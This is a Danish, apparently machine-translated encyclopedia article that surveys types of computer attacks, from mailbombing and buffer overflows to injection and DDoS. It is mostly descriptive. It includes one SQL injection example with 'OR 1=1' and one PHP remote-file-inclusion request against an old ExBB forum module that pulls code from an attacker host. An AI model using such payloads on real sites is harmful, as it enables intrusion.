Hackerangreb

Den aktuelle version af siden er endnu ikke blevet gennemgået af erfarne bidragydere og kan afvige væsentligt fra den version , der blev gennemgået den 14. oktober 2017; checks kræver 20 redigeringer .

Et hackerangreb i ordets snævre betydning - på nuværende tidspunkt forstås sætningen som et "angreb på et sikkerhedssystem", og tenderer mere til betydningen af ​​det følgende udtryk Cracker-angreb . Dette skyldtes en forkert fremstilling af betydningen af ​​selve ordet " hacker ".

Et hackerangreb i ordets brede forstand (oprindelig betydning) er en brainstorming, der sigter mod at finde måder at løse komplekse problemer på. En eller flere specialister af høj klasse ( hackere ) kan deltage i et hackerangreb. Som et resultat af brainstorming kan der opfindes ukonventionelle metoder til at løse et problem, eller der kan foretages optimeringsjusteringer af eksisterende metoder.

Et cracker - angreb  er en handling, der har til formål at overtage kontrol (ophøje rettigheder) over et fjerntliggende/lokalt computersystem, eller destabilisere det, eller lammelsesangreb.

Mailbombing ( SMTP )

Det anses for at være den ældste angrebsmetode, selvom dens essens er enkel og primitiv: et stort antal mail-meddelelser gør det umuligt at arbejde med postkasser, og nogle gange med hele mailservere . Mange programmer er blevet udviklet til dette formål, og selv en uerfaren bruger kunne udføre et angreb ved kun at angive offerets e-mail , beskedtekst og antallet af nødvendige beskeder. Mange sådanne programmer gjorde det muligt at skjule afsenderens rigtige IP-adresse ved at bruge en anonym mailserver til at sende e-mail . Dette angreb er svært at forhindre, da selv internetudbyderens mailfiltre ikke kan bestemme den rigtige spam -afsender . Udbyderen kan begrænse antallet af e-mails fra en enkelt afsender, men afsenderens adresse og emne genereres ofte tilfældigt .

Bufferoverløb

Måske en af ​​de mest almindelige typer angreb på internettet. Princippet for dette angreb er baseret på brugen af ​​softwarefejl, der gør det muligt at forårsage en hukommelsesbrud og nedbryde applikationen eller udføre vilkårlig binær kode på vegne af den bruger, som det sårbare program kørte under. Hvis programmet kører under systemadministratorkontoen, vil dette angreb give dig mulighed for at få fuld kontrol over ofrets computer, så det anbefales at arbejde under en almindelig brugers konto med begrænsede rettigheder på systemet og kun udføre handlinger, der kræver administrative rettigheder under systemadministratorkontoen.

Virus , trojanske heste , orme , sniffere , rootkits og andre specielle programmer

Den næste type angreb er en mere sofistikeret metode til at få adgang til klassificeret information - brugen af ​​specielle programmer til at arbejde på ofrets computer, samt yderligere distribution (disse er vira og orme). Sådanne programmer er designet til at søge efter og overføre hemmelige oplysninger til deres ejer eller blot for at skade sikkerhedssystemet og ydeevnen på ofrets computer. Funktionsprincipperne for disse programmer er forskellige.

Netværksintelligens

Under et sådant angreb udfører krakkeren faktisk ikke nogen destruktive handlinger, men som følge heraf kan den opnå fortrolig information om konstruktionen og principperne for driften af ​​ofrets computersystem. Den indhentede information kan bruges til kompetent at bygge det kommende angreb og udføres normalt på de forberedende stadier.

I løbet af en sådan rekognoscering kan en angriber udføre portscanning , DNS - forespørgsler , ping af åbne porte, tilstedeværelsen og sikkerheden af ​​proxyservere . Som et resultat kan du få information om de eksisterende DNS-adresser i systemet, hvem der ejer dem, hvilke tjenester der er tilgængelige på dem, adgangsniveauet til disse tjenester for eksterne og interne brugere.

Pakkesnifning

Det er også en ret almindelig type angreb baseret på driften af ​​et netværkskort i promiskuøs tilstand samt overvågningstilstand for Wi-Fi-netværk . I denne tilstand sendes alle pakker modtaget af netværkskortet til behandling til en speciel applikation kaldet sniffer . Som et resultat kan en angriber opnå en stor mængde serviceinformation: hvem, hvorfra og hvorfra transmitterede pakker, gennem hvilke adresser disse pakker passerede. Den største fare ved et sådant angreb er at få selve oplysningerne, såsom logins og adgangskoder på medarbejdere, som kan bruges til ulovligt at komme ind i systemet under dække af en almindelig ansat i virksomheden.

IP-spoofing

Også en almindelig type angreb i utilstrækkeligt beskyttede netværk, når en angriber udgiver sig for at være en autoriseret bruger, der er i selve organisationen eller uden for den. For at gøre dette skal crackeren bruge en IP-adresse, der er tilladt i netværkssikkerhedssystemet. Et sådant angreb er muligt, hvis sikkerhedssystemet kun tillader brugeridentifikation ved hjælp af IP-adresse og ikke kræver yderligere bekræftelser.

Man-in-the-Middle

En type angreb, når en angriber opsnapper kommunikationskanalen mellem to systemer og får adgang til al overført information. Når en angriber får adgang på dette niveau, kan han ændre informationen på den måde, han har brug for for at nå sine mål. Formålet med et sådant angreb er ulovligt at skaffe, stjæle eller forfalske overførte oplysninger eller få uautoriseret adgang til netværksressourcer. Sådanne angreb er ekstremt vanskelige at spore, da angriberen normalt befinder sig inde i organisationen.

Kodeindsprøjtning

En familie af angreb forenet af et fælles princip - som et resultat af angrebet udføres data som kode.

SQL-injektion  er et angreb, hvor parametrene for SQL -forespørgsler til databasen ændres. Som følge heraf får anmodningen en helt anden betydning, og i tilfælde af utilstrækkelig filtrering af inputdataene kan den ikke blot vise fortrolig information, men også ændre/slette dataene. Meget ofte kan denne type angreb observeres på eksemplet med websteder, der bruger kommandolinjeparametre (i dette tilfælde URL -variabler ) til at bygge SQL-forespørgsler til databaser uden korrekt validering [1] .

VÆLG feltliste FRA tabel WHERE id = 23 ELLER 1=1;I stedet for at tjekke, kan du erstatte en erklæring
, der, hvis den er sand , giver dig mulighed for at omgå kontrollen

PHP-injektion  er en af ​​måderne at hacke websteder , der kører på PHP . Det består i at injicere et specielt udformet ondsindet script i webapplikationskoden på serversiden af ​​webstedet, hvilket fører til udførelse af vilkårlige kommandoer. Det er kendt, at mange gratis motorer og fora, der kører på PHP, som er udbredt på internettet (oftest er disse forældede versioner) har dårligt gennemtænkte moduler eller separate strukturer med sårbarheder. Crackere analyserer sådanne sårbarheder som uundgåede variabler, der modtager eksterne værdier. For eksempel udnyttes den gamle ExBB-forumsårbarhed af hackere med anmodningen: GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.

Cross Site Scripting eller XSS ( forkortelse fra engelsk  Cross Site Scripting , ikke at forveksle med CSS ( Cascade Style Sheet )) er en type sårbarheder, der almindeligvis findes i webapplikationer, der tillader ondsindede brugere at injicere kode på websider, der ses af andre brugere . Eksempler på sådan kode er HTML-kode og scripts på klientsiden, oftest JavaScript .

XPath-injektion  er en type sårbarhed, der involverer indsprøjtning af XPath -udtryk i den oprindelige anmodning til en XML - database . Som med andre former for injektion er sårbarheden mulig på grund af utilstrækkelig validering af inputdata.

Autofill  er en webinjektion, der fungerer efter princippet om trojanske heste, hvis hovedformål er at infiltrere brugerens konto i betalingssystemet , umærkeligt ændre transaktionsdata ved at ændre HTML -koden og overføre brugerens penge til angriberens konto.

Social engineering

Social engineering (fra engelsk  social engineering ) - brugen af ​​inkompetence, inkompetence eller uagtsomhed hos personalet for at få adgang til information. Denne metode anvendes normalt uden en computer, ved hjælp af en almindelig telefon eller mail. På denne måde opnås normalt en lang række informationer. I løbet af et sådant angreb etablerer angriberen kontakt med offeret og forsøger, vildledende eller opnår tillid, at skaffe de nødvendige oplysninger, som er svære at få fat på på anden måde, eller andre måder er mere risikable.

Denial of Service

DoS (fra engelsk.  Denial of Service  - Denial of Service) - et angreb, der har til formål at få serveren til ikke at reagere på anmodninger. Denne type angreb involverer ikke indhentning af nogle hemmelige oplysninger, men nogle gange er det en hjælp til at initialisere andre angreb. For eksempel kan nogle programmer, på grund af fejl i deres kode, forårsage undtagelser , og når tjenester er deaktiveret, kan de udføre kode leveret af en angriber eller oversvømme angreb, når serveren ikke kan behandle et stort antal indkommende pakker.

DDoS (fra det engelske  Distributed Denial of Service  - Distributed DoS) er en undertype af DoS-angreb, der har samme mål som DoS, men er ikke lavet fra én computer, men fra flere computere på netværket. Disse typer angreb bruger enten forekomsten af ​​fejl, der fører til et lammelsesangreb på tjenesten, eller driften af ​​beskyttelsen, hvilket fører til blokering af driften af ​​tjenesten og som et resultat også til et lammelsesangreb. DDoS bruges, hvor almindelig DoS er ineffektiv. For at gøre dette kombineres flere computere, og hver udfører et DoS-angreb på ofrets system. Tilsammen kaldes dette et DDoS-angreb. Størrelsen af ​​et botnet kan variere fra flere tiere til flere hundrede tusinde computere.

Ethvert angreb er intet andet end et forsøg på at bruge ufuldkommenheden i ofrets sikkerhedssystem enten til at indhente information eller til at skade systemet, derfor er årsagen til ethvert vellykket angreb crackerens professionalisme og værdien af ​​informationen, samt sikkerhedssystemadministratorens manglende kompetence , især ufuldkommen software og utilstrækkelig opmærksomhed på sikkerhedsproblemer i virksomheden som helhed.

Se også

Noter

  1. SQL Injection Attacks by Example Arkiveret 7. november 2015 på Wayback Machine 

Links